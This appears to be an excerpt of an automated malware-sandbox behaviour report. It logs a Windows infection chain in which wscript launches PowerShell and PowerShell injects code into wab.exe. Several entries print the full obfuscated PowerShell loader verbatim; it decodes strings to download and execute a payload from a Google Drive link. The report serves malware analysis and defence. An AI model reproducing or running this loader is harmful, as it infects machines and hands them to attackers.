            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98750Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98641Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98530Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98421Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98313Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98172Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98063Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97953Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 1200000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 1199889Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 1199781Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 1199672Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 1199563Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 1199438Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 1199313Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 1199188Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 1199075Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 1198969Jump to behavior
            Source: wab.exe, 00000008.00000002.3277379903.0000000000508000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx1V%SystemRoot%\system32\mswsock.dll
            Source: powershell.exe, 00000002.00000002.2710598432.000001D6DBDDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllem
            Source: powershell.exe, 00000005.00000002.2418986473.0000000007680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
            Source: wab.exe, 00000008.00000002.3277379903.000000000055C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_090E0000 LdrInitializeThunk,5_2_090E0000
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3AA0000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: EF960Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLedJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Myxogaster.Opv && echo $"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLedJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Myxogaster.Opv && echo $"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$allentown = 1;$ordknappestes='substrin';$ordknappestes+='g';function preinterceded($veinwise){$regnorms=$veinwise.length-$allentown;for($jargonium=5; $jargonium -lt $regnorms; $jargonium+=(6)){$woodener+=$veinwise.$ordknappestes.invoke($jargonium, $allentown);}$woodener;}function infatuatedly($beneficeforestillingernes191){. ($subcutaneous) ($beneficeforestillingernes191);}$indknebnes=preinterceded 'hyperm trveo givez straivejr.lovervl cyanagarde/ myto5b.lli.skved0musik appro(acerrw,argaithoseneskadd.lyveoun,epwmahogsforsm midtonunpu.tallus rveja1share0tales.ove,f0sp yd;packw has.wuprodidecimnsemis6upda.4vaude;.saru j mcrxtwinn6 hi c4 ph l;,assa fiberalabavopfin:optag1 tele2under1hlqnu. ant.0uni c) sner ,rwing.lapsemonercwightk trano unhe/clime2bibri0westm1folke0taabe0indsk1 phle0derhj1svrme udligftimeli philr sa.debla,sfjuvalovar gx s,oe/uegen1syda.2thurl1under.tra.y0 slet ';$sevenbommens=preinterceded 'indtru.ecansreilae diplrraphi-deltaab,ckbgskak e ,ikrncodswtincom ';$socionoms=preinterceded 'dativhsole tblaa.t.otlypu ions pr i:trima/uninf/peltidbiscarsolsii,ecapvbankaecalpa.,ortagaktieoforkaos.detgrepubludenrefor l.unac,cmash obygnimbyr e/rud,sule escung.r?syncre ko sxsids.p.rempoinputr l,lit isop= sansdensidomindewfilipn ob.llklyngoeddika,rendddoven&naturik,rofdtro t= samf1 unpaycolliethebae ph njpref.v liteot.grygvandrccoequ5 nasittiresnanskufcomplf marmdi,jur9erind1 allo7.ladd6 ejeremissedwater_taa,t0dyspekblazysrapnd8foderycoteh3chaufysynthn nedirdatakmkommew te n ';$anskaffelsessummerne=preinterceded 'rumne>chann ';$subcutaneous=preinterceded 'routeifor,belysstx.akey ';$mesopodiale='krnikens';infatuatedly (preinterceded 'her.us,ndebestatutst ej-geoaech.lakol.llentenodtreakte apo,nsummeter mi adhsi-homelpskyggasimontb,bonh lles formato duc:.ream\stigmdchagordormiystyrtascrufsdi.re. j,llts.warx ngsetinds, su.p-f ekvvascogaultralskoleudag,oe,nsgn vandh$etherme tadeyeomastrillosrettpchiliomora duptubibyt ea.virkl.uinye tros; fin, ');infatuatedly (preinterceded ' ae iigyrinfradze bjden(prevotunrenet.ggespatibtfratr-necrop evenaro.entkabyshom.in bo.tgtsuper:fa,ri\ richd trior,rdskybolsmapes,isarchi.redbrtdefekxstryctskn,e) nte{ costedoradx,oopri i,rat farl}co.se;diakr ');$knscelle = preinterceded '.nvesepragtcsnknihprovioanker vnin%sor,eahovedpc,untpcountdskopua aniktsamgiacuck %leaka\man,mms peryestrexhumblopostcgcardia espasunde,t forses iklrphon .,ngseokindepce.trvfolke hypot&pseud&misco fo,tyecoloucvigtihgstevo spor alm$udg.a ';infatuatedly (preinterceded 'g.lli$ navlgyderllgalvaocaptibomsteacoryzlevigt: sansb diakostilllproletskovfa skrinrise,tllebr=dis b( tor,c atmommanifdgents formi/.adjacsak.n saf,$stat.kfrondnissensenl rcste,ie dronlbe kelantiken dkm)in,al ');infatuatedly (preinterceded 'slide$centrgtraktln,ncook,ssabcovenafork,lspyds: fretaun,lefaktiot.mbyga orval.evrdesaftekklokkaqu drldobb.eled
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$allentown = 1;$ordknappestes='substrin';$ordknappestes+='g';function preinterceded($veinwise){$regnorms=$veinwise.length-$allentown;for($jargonium=5; $jargonium -lt $regnorms; $jargonium+=(6)){$woodener+=$veinwise.$ordknappestes.invoke($jargonium, $allentown);}$woodener;}function infatuatedly($beneficeforestillingernes191){. ($subcutaneous) ($beneficeforestillingernes191);}$indknebnes=preinterceded 'hyperm trveo givez straivejr.lovervl cyanagarde/ myto5b.lli.skved0musik appro(acerrw,argaithoseneskadd.lyveoun,epwmahogsforsm midtonunpu.tallus rveja1share0tales.ove,f0sp yd;packw has.wuprodidecimnsemis6upda.4vaude;.saru j mcrxtwinn6 hi c4 ph l;,assa fiberalabavopfin:optag1 tele2under1hlqnu. ant.0uni c) sner ,rwing.lapsemonercwightk trano unhe/clime2bibri0westm1folke0taabe0indsk1 phle0derhj1svrme udligftimeli philr sa.debla,sfjuvalovar gx s,oe/uegen1syda.2thurl1under.tra.y0 slet ';$sevenbommens=preinterceded 'indtru.ecansreilae diplrraphi-deltaab,ckbgskak e ,ikrncodswtincom ';$socionoms=preinterceded 'dativhsole tblaa.t.otlypu ions pr i:trima/uninf/peltidbiscarsolsii,ecapvbankaecalpa.,ortagaktieoforkaos.detgrepubludenrefor l.unac,cmash obygnimbyr e/rud,sule escung.r?syncre ko sxsids.p.rempoinputr l,lit isop= sansdensidomindewfilipn ob.llklyngoeddika,rendddoven&naturik,rofdtro t= samf1 unpaycolliethebae ph njpref.v liteot.grygvandrccoequ5 nasittiresnanskufcomplf marmdi,jur9erind1 allo7.ladd6 ejeremissedwater_taa,t0dyspekblazysrapnd8foderycoteh3chaufysynthn nedirdatakmkommew te n ';$anskaffelsessummerne=preinterceded 'rumne>chann ';$subcutaneous=preinterceded 'routeifor,belysstx.akey ';$mesopodiale='krnikens';infatuatedly (preinterceded 'her.us,ndebestatutst ej-geoaech.lakol.llentenodtreakte apo,nsummeter mi adhsi-homelpskyggasimontb,bonh lles formato duc:.ream\stigmdchagordormiystyrtascrufsdi.re. j,llts.warx ngsetinds, su.p-f ekvvascogaultralskoleudag,oe,nsgn vandh$etherme tadeyeomastrillosrettpchiliomora duptubibyt ea.virkl.uinye tros; fin, ');infatuatedly (preinterceded ' ae iigyrinfradze bjden(prevotunrenet.ggespatibtfratr-necrop evenaro.entkabyshom.in bo.tgtsuper:fa,ri\ richd trior,rdskybolsmapes,isarchi.redbrtdefekxstryctskn,e) nte{ costedoradx,oopri i,rat farl}co.se;diakr ');$knscelle = preinterceded '.nvesepragtcsnknihprovioanker vnin%sor,eahovedpc,untpcountdskopua aniktsamgiacuck %leaka\man,mms peryestrexhumblopostcgcardia espasunde,t forses iklrphon .,ngseokindepce.trvfolke hypot&pseud&misco fo,tyecoloucvigtihgstevo spor alm$udg.a ';infatuatedly (preinterceded 'g.lli$ navlgyderllgalvaocaptibomsteacoryzlevigt: sansb diakostilllproletskovfa skrinrise,tllebr=dis b( tor,c atmommanifdgents formi/.adjacsak.n saf,$stat.kfrondnissensenl rcste,ie dronlbe kelantiken dkm)in,al ');infatuatedly (preinterceded 'slide$centrgtraktln,ncook,ssabcovenafork,lspyds: fretaun,lefaktiot.mbyga orval.evrdesaftekklokkaqu drldobb.eled
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$allentown = 1;$ordknappestes='substrin';$ordknappestes+='g';function preinterceded($veinwise){$regnorms=$veinwise.length-$allentown;for($jargonium=5; $jargonium -lt $regnorms; $jargonium+=(6)){$woodener+=$veinwise.$ordknappestes.invoke($jargonium, $allentown);}$woodener;}function infatuatedly($beneficeforestillingernes191){. ($subcutaneous) ($beneficeforestillingernes191);}$indknebnes=preinterceded 'hyperm trveo givez straivejr.lovervl cyanagarde/ myto5b.lli.skved0musik appro(acerrw,argaithoseneskadd.lyveoun,epwmahogsforsm midtonunpu.tallus rveja1share0tales.ove,f0sp yd;packw has.wuprodidecimnsemis6upda.4vaude;.saru j mcrxtwinn6 hi c4 ph l;,assa fiberalabavopfin:optag1 tele2under1hlqnu. ant.0uni c) sner ,rwing.lapsemonercwightk trano unhe/clime2bibri0westm1folke0taabe0indsk1 phle0derhj1svrme udligftimeli philr sa.debla,sfjuvalovar gx s,oe/uegen1syda.2thurl1under.tra.y0 slet ';$sevenbommens=preinterceded 'indtru.ecansreilae diplrraphi-deltaab,ckbgskak e ,ikrncodswtincom ';$socionoms=preinterceded 'dativhsole tblaa.t.otlypu ions pr i:trima/uninf/peltidbiscarsolsii,ecapvbankaecalpa.,ortagaktieoforkaos.detgrepubludenrefor l.unac,cmash obygnimbyr e/rud,sule escung.r?syncre ko sxsids.p.rempoinputr l,lit isop= sansdensidomindewfilipn ob.llklyngoeddika,rendddoven&naturik,rofdtro t= samf1 unpaycolliethebae ph njpref.v liteot.grygvandrccoequ5 nasittiresnanskufcomplf marmdi,jur9erind1 allo7.ladd6 ejeremissedwater_taa,t0dyspekblazysrapnd8foderycoteh3chaufysynthn nedirdatakmkommew te n ';$anskaffelsessummerne=preinterceded 'rumne>chann ';$subcutaneous=preinterceded 'routeifor,belysstx.akey ';$mesopodiale='krnikens';infatuatedly (preinterceded 'her.us,ndebestatutst ej-geoaech.lakol.llentenodtreakte apo,nsummeter mi adhsi-homelpskyggasimontb,bonh lles formato duc:.ream\stigmdchagordormiystyrtascrufsdi.re. j,llts.warx ngsetinds, su.p-f ekvvascogaultralskoleudag,oe,nsgn vandh$etherme tadeyeomastrillosrettpchiliomora duptubibyt ea.virkl.uinye tros; fin, ');infatuatedly (preinterceded ' ae iigyrinfradze bjden(prevotunrenet.ggespatibtfratr-necrop evenaro.entkabyshom.in bo.tgtsuper:fa,ri\ richd trior,rdskybolsmapes,isarchi.redbrtdefekxstryctskn,e) nte{ costedoradx,oopri i,rat farl}co.se;diakr ');$knscelle = preinterceded '.nvesepragtcsnknihprovioanker vnin%sor,eahovedpc,untpcountdskopua aniktsamgiacuck %leaka\man,mms peryestrexhumblopostcgcardia espasunde,t forses iklrphon .,ngseokindepce.trvfolke hypot&pseud&misco fo,tyecoloucvigtihgstevo spor alm$udg.a ';infatuatedly (preinterceded 'g.lli$ navlgyderllgalvaocaptibomsteacoryzlevigt: sansb diakostilllproletskovfa skrinrise,tllebr=dis b( tor,c atmommanifdgents formi/.adjacsak.n saf,$stat.kfrondnissensenl rcste,ie dronlbe kelantiken dkm)in,al ');infatuatedly (preinterceded 'slide$centrgtraktln,ncook,ssabcovenafork,lspyds: fretaun,lefaktiot.mbyga orval.evrdesaftekklokkaqu drldobb.eledJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$allentown = 1;$ordknappestes='substrin';$ordknappestes+='g';function preinterceded($veinwise){$regnorms=$veinwise.length-$allentown;for($jargonium=5; $jargonium -lt $regnorms; $jargonium+=(6)){$woodener+=$veinwise.$ordknappestes.invoke($jargonium, $allentown);}$woodener;}function infatuatedly($beneficeforestillingernes191){. ($subcutaneous) ($beneficeforestillingernes191);}$indknebnes=preinterceded 'hyperm trveo givez straivejr.lovervl cyanagarde/ myto5b.lli.skved0musik appro(acerrw,argaithoseneskadd.lyveoun,epwmahogsforsm midtonunpu.tallus rveja1share0tales.ove,f0sp yd;packw has.wuprodidecimnsemis6upda.4vaude;.saru j mcrxtwinn6 hi c4 ph l;,assa fiberalabavopfin:optag1 tele2under1hlqnu. ant.0uni c) sner ,rwing.lapsemonercwightk trano unhe/clime2bibri0westm1folke0taabe0indsk1 phle0derhj1svrme udligftimeli philr sa.debla,sfjuvalovar gx s,oe/uegen1syda.2thurl1under.tra.y0 slet ';$sevenbommens=preinterceded 'indtru.ecansreilae diplrraphi-deltaab,ckbgskak e ,ikrncodswtincom ';$socionoms=preinterceded 'dativhsole tblaa.t.otlypu ions pr i:trima/uninf/peltidbiscarsolsii,ecapvbankaecalpa.,ortagaktieoforkaos.detgrepubludenrefor l.unac,cmash obygnimbyr e/rud,sule escung.r?syncre ko sxsids.p.rempoinputr l,lit isop= sansdensidomindewfilipn ob.llklyngoeddika,rendddoven&naturik,rofdtro t= samf1 unpaycolliethebae ph njpref.v liteot.grygvandrccoequ5 nasittiresnanskufcomplf marmdi,jur9erind1 allo7.ladd6 ejeremissedwater_taa,t0dyspekblazysrapnd8foderycoteh3chaufysynthn nedirdatakmkommew te n ';$anskaffelsessummerne=preinterceded 'rumne>chann ';$subcutaneous=preinterceded 'routeifor,belysstx.akey ';$mesopodiale='krnikens';infatuatedly (preinterceded 'her.us,ndebestatutst ej-geoaech.lakol.llentenodtreakte apo,nsummeter mi adhsi-homelpskyggasimontb,bonh lles formato duc:.ream\stigmdchagordormiystyrtascrufsdi.re. j,llts.warx ngsetinds, su.p-f ekvvascogaultralskoleudag,oe,nsgn vandh$etherme tadeyeomastrillosrettpchiliomora duptubibyt ea.virkl.uinye tros; fin, ');infatuatedly (preinterceded ' ae iigyrinfradze bjden(prevotunrenet.ggespatibtfratr-necrop evenaro.entkabyshom.in bo.tgtsuper:fa,ri\ richd trior,rdskybolsmapes,isarchi.redbrtdefekxstryctskn,e) nte{ costedoradx,oopri i,rat farl}co.se;diakr ');$knscelle = preinterceded '.nvesepragtcsnknihprovioanker vnin%sor,eahovedpc,untpcountdskopua aniktsamgiacuck %leaka\man,mms peryestrexhumblopostcgcardia espasunde,t forses iklrphon .,ngseokindepce.trvfolke hypot&pseud&misco fo,tyecoloucvigtihgstevo spor alm$udg.a ';infatuatedly (preinterceded 'g.lli$ navlgyderllgalvaocaptibomsteacoryzlevigt: sansb diakostilllproletskovfa skrinrise,tllebr=dis b( tor,c atmommanifdgents formi/.adjacsak.n saf,$stat.kfrondnissensenl rcste,ie dronlbe kelantiken dkm)in,al ');infatuatedly (preinterceded 'slide$centrgtraktln,ncook,ssabcovenafork,lspyds: fretaun,lefaktiot.mbyga orval.evrdesaftekklokkaqu drldobb.eledJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
